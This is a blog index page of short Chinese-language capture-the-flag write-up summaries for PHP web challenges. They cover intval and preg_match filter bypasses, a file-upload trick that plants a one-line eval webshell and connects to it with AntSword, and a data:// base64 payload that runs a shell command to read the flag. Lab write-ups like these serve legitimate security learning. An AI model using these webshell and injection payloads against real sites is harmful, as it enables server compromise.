摘要: +010574依旧会被认为是010574,同时第一个字符不是0,符合条件 payload:?num=+010574 阅读全文
posted @ 2021-02-04 11:45 z1ten9 阅读(195) 评论(0) 推荐(0)
摘要: 过滤了字母,同时第一个数字不能是0 可以利用小数绕过,intval只识别整数部分 payload:?num=4476.0 阅读全文
posted @ 2021-02-04 11:39 z1ten9 阅读(164) 评论(0) 推荐(0)
摘要: 过滤了字母,那就不能用十六进制了,用八进制绕过 payload:?num=010574 阅读全文
posted @ 2021-02-04 11:37 z1ten9 阅读(91) 评论(0) 推荐(0)
摘要: 又要4476又不要4476,可以利用十六进制或八进制绕过(intval可以识别十六进制和八进制) payload:?num=0x117c 或 payload:?num=010574 阅读全文
posted @ 2021-02-04 11:32 z1ten9 阅读(134) 评论(0) 推荐(0)
摘要: /m代表匹配多行数据,可以利用%0a绕过 payload:?cmd=%0aphp 阅读全文
posted @ 2021-02-04 11:26 z1ten9 阅读(288) 评论(0) 推荐(0)
摘要: payload:?num=4476x 阅读全文
posted @ 2021-02-04 11:01 z1ten9 阅读(202) 评论(0) 推荐(0)
摘要: 题目对数字进行了过滤,但又需要传入数字 利用preg_match()函数无法处理数组的漏洞 payload:?num[]=9 阅读全文
posted @ 2021-02-04 10:44 z1ten9 阅读(170) 评论(0) 推荐(0)
摘要: 同web151 阅读全文
posted @ 2021-02-03 21:35 z1ten9 阅读(216) 评论(0) 推荐(0)
摘要: 只能上传png图片,我们写一个一句话木马<?php @eval($_POST['attack']) ?> 重命名为1.png,bp抓包,然后上传, ctrl+R放到repeater中,将1.png改为1.php GO一下,发现上传成功,返回了上传路径/upload/1.php 用蚁剑连接,在/var 阅读全文
posted @ 2021-02-03 21:29 z1ten9 阅读(282) 评论(2) 推荐(0)
摘要: payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==即 阅读全文
posted @ 2021-02-03 15:55 z1ten9 阅读(251) 评论(0) 推荐(0)